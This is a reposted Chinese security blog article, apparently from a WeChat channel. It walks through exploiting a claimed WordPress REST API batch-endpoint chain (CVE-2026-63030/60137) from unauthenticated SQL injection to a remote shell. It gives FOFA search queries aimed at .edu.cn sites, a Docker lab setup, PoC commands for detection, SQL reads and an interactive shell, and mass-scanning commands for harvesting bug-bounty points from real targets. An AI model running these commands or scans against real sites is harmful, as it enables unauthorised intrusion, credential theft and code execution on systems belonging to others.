【edu通杀刷分】CVE-2026-63030/60137-Wp2Shell命令执行+SQL注入

admin 2026-07-28 04:36:36 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 该文档详细介绍了WordPressRESTAPI批量请求端点中的CVE-2026-63030/60137漏洞链,可实现未授权SQL注入获取管理员密码哈希,进而通过插件安装功能实现远程代码执行。文档提供了影响版本、利用条件、靶场搭建步骤、POC脚本使用及批量刷分方法,旨在帮助安全研究人员进行教育SRC漏洞挖掘。 综合评分: 75 文章分类: 渗透测试,漏洞分析,红队,WEB安全,安全工具


cover_image

【edu通杀刷分】CVE-2026-63030/60137-Wp2Shell命令执行+SQL注入

XYsec

2026年7月27日 14:30 山东

在小说阅读器读本章

去阅读

以下文章来源于神农Sec ,作者神农Sec

神农Sec .

专注于SRC漏洞挖掘、红蓝对抗、渗透测试、代码审计JS逆向,CNVD和EDUSRC漏洞挖掘。不定期分享网络安全领域各种好玩的项目及好用的工具,欢迎关注。#尽在神农Sec# 文章如有侵权,请联系删除,感谢!

课程培训

扫码咨询

#

专注于SRC漏洞挖掘、红蓝对抗、渗透测试、代码审计JS逆向,CNVD和EDUSRC漏洞挖掘,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(课程培训限时优惠)。

#

01

0x1 【edu通杀刷分】CVE-2026-63030/60137-Wp2Shell命令执行+SQL注入

0x1 前言

WordPress 内置 REST API,允许开发者通过 HTTP 请求与站点进行数据交互,实现前后端分离、移动应用对接及第三方服务集成。其批量请求端点(/wp-json/batch/v1)自5.6版本起内置,用于将多个子请求打包为单次 HTTP 调用以提升性能。攻击者无需身份认证即可通过漏洞链触发数据库查询,实现管理员账户信息泄露。可实现未授权 SQL 注入获取管理员密码哈希,再通过破解管理员密码并利用插件安装功能可实现代码执行。

null

影响版本

  • WordPress 6.8.0-6.85
  • WordPress 6.9.0 – 6.9.4
  • WordPress 7.0.0 – 7.0.1

利用条件:

  • 目标系统的REST API 接口处于开启状态【WordPress 默认开启】

FOFA语法:

app="WordPress"

null

edu刷证书站也是OK的

app="WordPress" && host="edu.cn"

null

null

0x2 靶场环境搭建

靶场下载:

先下载官方 WordPress 6.9.4 源码:https://wordpress.org/wordpress-6.9.4.tar.gz

null

进入wordpress 文件夹,在同目录新建docker-compose.yml,内容如下:

services:
  web:
    image: wordpress:6.9.4-apache
    ports:
      - "8090:80"
    environment:
      WORDPRESS_DB_HOST: db
      WORDPRESS_DB_USER: wpuser
      WORDPRESS_DB_PASSWORD: wppass
      WORDPRESS_DB_NAME: wpdb
    volumes:
      - ./:/var/www/html
    depends_on:
      - db
    restart: unless-stopped

  db:
    image: mariadb:10.6
    environment:
      MYSQL_DATABASE: wpdb
      MYSQL_USER: wpuser
      MYSQL_PASSWORD: wppass
      MYSQL_ROOT_PASSWORD: rootpass
    volumes:
      - db_data:/var/lib/mysql
    restart: unless-stopped

volumes:
  db_data:

null

启动环境:

# 启动容器
docker-compose up -d

# 给目录权限,避免安装报错
docker-compose exec web chown -R www-data:www-data /var/www/html

null

访问:http://localhost:8090/

null

null

0x3 漏洞利用

一、poc脚本

GitHub项目地址:

   https://github.com/Icex0/wp2shell-poc

null

1、漏洞存活检测

python3 wp2shell.py check http://localhost:8090/

重点关注这一行,若存在,说明目标存在 Batch 路由混淆行为:

[+] VULNERABLE — batch route-confusion behavior detected.

null

2、SQL注入漏洞

python3 wp2shell.py read http://127.0.0.1:8090 --query "SELECT DATABASE()"
python3 wp2shell.py read http://127.0.0.1:8090 --query "SELECT @@version"

null

3、命令执行RCE

python3 wp2shell.py shell http://localhost:8090/ -i

null

二、批量刷分

FOFA语法:

app="WordPress"

null

把相关资产导出,然后使用下面这个脚本批量测试,GitHub项目地址:

https://github.com/fullhunt/wp2shell-scan

null

安装依赖:

pip3 install -r requirements.txt

null

  • -u 单个目标
  • -f 批量目标文件(txt 一行一个 URL)
  • -o 输出结果文件
  • --check-type检测模式
  • time-based 时间盲注(推荐,无破坏、最稳定)
  • error-based 报错盲注(速度快,部分站点会拦截报错)
  • --timeout 请求超时时间
  • --delay 盲注休眠时长(默认 3 秒)

批量检测命令(时间盲注,推荐)

python3 wp2shell-scan.py check -l targets.txt

null

存在漏洞即显示下面的:

null

三、Yakit插件漏洞扫

下载对应CVE漏洞的插件

null

null

批量导入

null

直接就可以看存在漏洞的资产了

null


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:XYsec 《【edu通杀刷分】CVE-2026-63030/60137-Wp2Shell命令执行+SQL注入》

评论:0   参与:  0